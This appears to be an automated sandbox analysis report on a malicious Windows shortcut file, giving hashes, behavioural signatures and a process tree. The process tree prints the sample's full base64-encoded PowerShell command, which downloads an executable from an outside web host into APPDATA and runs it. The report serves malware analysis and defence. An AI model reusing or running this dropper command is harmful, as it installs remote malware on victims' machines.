Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
02/06/2024, 08:01
Static task
static1
Behavioral task
behavioral1
Sample
8d63176518c0a7a67f514e7d0463114f_JaffaCakes118.lnk
Resource
win7-20240221-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
8d63176518c0a7a67f514e7d0463114f_JaffaCakes118.lnk
Resource
win10v2004-20240426-en
5 signatures
150 seconds
General
-
Target
8d63176518c0a7a67f514e7d0463114f_JaffaCakes118.lnk
-
Size
3KB
-
MD5
8d63176518c0a7a67f514e7d0463114f
-
SHA1
d78da4598fe644343e88f774073c61758d718e3f
-
SHA256
af96a33e4535ef37b063c371c6e733845fea79ce81e534f28f43e395a57d96a6
-
SHA512
560ddf254e4d48b634b14dd7c6aeaa054610308b739e319a654e73f68f82d7f5a3a6d9fbfa2d45634e378dfa6b7c24a76e9923b0fb7de66d119a0919afe2b239
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2656 Powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2656 Powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1444 wrote to memory of 2656 1444 cmd.exe 29 PID 1444 wrote to memory of 2656 1444 cmd.exe 29 PID 1444 wrote to memory of 2656 1444 cmd.exe 29
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\8d63176518c0a7a67f514e7d0463114f_JaffaCakes118.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe" UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAcgBvAGYAaQBsAGUAIAAtAGMAbwBtAG0AYQBuAGQAIAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AbgBvAGMAcwAuAGMAbwBtAC4AYgByAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHQAaABlAG0AZQBzAC8AYwBhAGsAZQAvAG0AZAAyAC4AcABoAHAAIgAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABNAEQAMgAzADMAMgA0ADMALgBlAHgAZQAiACkAOwBOAGUAdwAtAEkAdABlAG0AIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAYQAiACAALQB0AHkAcABlACAAZgBpAGwAZQAgAC0AZgBvAHIAYwBlACAALQB2AGEAbAB1AGUAIAAiAEYANAAwADYARAA2ADAAMQAwAEQAMABEADAAOQAwAEMARAAzAEMAOABDADgAMABCAEYAQQAxADAAQwA3ADAAMAAwADIAMABEADAAMQAwAEUARgBCADAARQAwAEMARgBFADAAQgBGAEMAMAA4ADAANwAwAEQARgBFADAANwAwAEQAQwA3AEYAQwAwADgAMAA2AEMAOAAwADYAMAA4ADEAMwBGAEQARgBFADAARgBGAEYAMAAyADAAQgBGAEUARgBGADAAOAAxADEAQwA4ADAAMgAwADcAMABDADAARABGAEEAMAA1ADAANQBGAEYAQwA4ADAANgBGAEEAMABDADAARABGAEUAMABCAEMAOABGAEIAMAAyADAANwAwADAARgBFADAAQgAwAEMAQwA3AEYAQwBGAEEARgBCAEQANgAwADYARgA2AEYANABGAEEARAA2AEMAQQBEADYARgBBAEYANgBCADkARgA0AEYARABEADYARQA5AEQARQBGADMARABBAEUAOABEADYARgBEAEYANgBGADQAMABEAEQANgBEAEMARgAxAEMANgBFADIARQA3AEQARgBEAEUARABDAEUARABDADkAQwBBAEQANgAwAEQARgA2ACIAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAE0ARAAyADMAMwAyADQAMwAuAGUAeABlADsA2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2656
-